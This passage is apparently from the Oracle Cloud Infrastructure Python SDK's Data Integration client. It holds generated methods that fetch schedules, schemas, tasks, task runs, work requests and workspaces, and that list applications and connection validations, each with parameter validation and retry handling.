retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Reference")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Reference")
def get_schedule(self, workspace_id, application_key, schedule_key, **kwargs):
"""
Retrieves schedule by schedule key
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str schedule_key: (required)
Schedule Key
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_schedule.py.html>`__ to see an example of how to use get_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules/{scheduleKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"scheduleKey": schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schedule")
def get_schema(self, workspace_id, connection_key, schema_resource_name, **kwargs):
"""
Retrieves a schema that can be accessed using the specified connection.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schema`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_schema.py.html>`__ to see an example of how to use get_schema API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_schema got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schema")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schema")
def get_task(self, workspace_id, task_key, **kwargs):
"""
Retrieves a task using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If value is true, then all referenced objects are expanded. If value is false, then shallow objects are returned in place of references. Default is false. <br><br><B>Example:</B><br> <ul> <li><B>?expandReferences=true</B> returns all objects of type data loader task</li> </ul>
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Task`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task.py.html>`__ to see an example of how to use get_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Task")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Task")
def get_task_run(self, workspace_id, application_key, task_run_key, **kwargs):
"""
Retrieves a task run using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRun`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task_run.py.html>`__ to see an example of how to use get_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskRun")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskRun")
def get_task_schedule(self, workspace_id, application_key, task_schedule_key, **kwargs):
"""
Endpoint used to get taskSchedule by its key
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_schedule_key: (required)
TaskSchedule Key
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSchedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task_schedule.py.html>`__ to see an example of how to use get_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules/{taskScheduleKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskScheduleKey": task_schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskSchedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskSchedule")
def get_task_validation(self, workspace_id, task_validation_key, **kwargs):
"""
Retrieves a task validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_validation_key: (required)
The task validation key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task_validation.py.html>`__ to see an example of how to use get_task_validation API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations/{taskValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskValidationKey": task_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskValidation")
def get_work_request(self, work_request_id, **kwargs):
"""
Retrieves the status of the work request with the given ID.
:param str work_request_id: (required)
The ID of the asynchronous work request to retrieve.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.WorkRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_work_request.py.html>`__ to see an example of how to use get_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
def get_workspace(self, workspace_id, **kwargs):
"""
Retrieves a Data Integration workspace using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Workspace`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_workspace.py.html>`__ to see an example of how to use get_workspace API.
"""
resource_path = "/workspaces/{workspaceId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Workspace")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Workspace")
def list_applications(self, workspace_id, **kwargs):
"""
Retrieves a list of applications and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ApplicationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_applications.py.html>`__ to see an example of how to use list_applications API.
"""
resource_path = "/workspaces/{workspaceId}/applications"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"identifier",
"fields",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_applications got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ApplicationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ApplicationSummaryCollection")
def list_connection_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of connection validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_connection_validations.py.html>`__ to see an example of how to use list_connection_validations API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_connection_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionValidationSummaryCollection")
def list_connections(self, workspace_id, data_asset_key, **kwargs):
"""
Retrieves a list of all connections.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
Used to filter by the data asset key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str type: (optional)
Type of the object to filter the results with.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_connections.py.html>`__ to see an example of how to use list_connections API.
"""
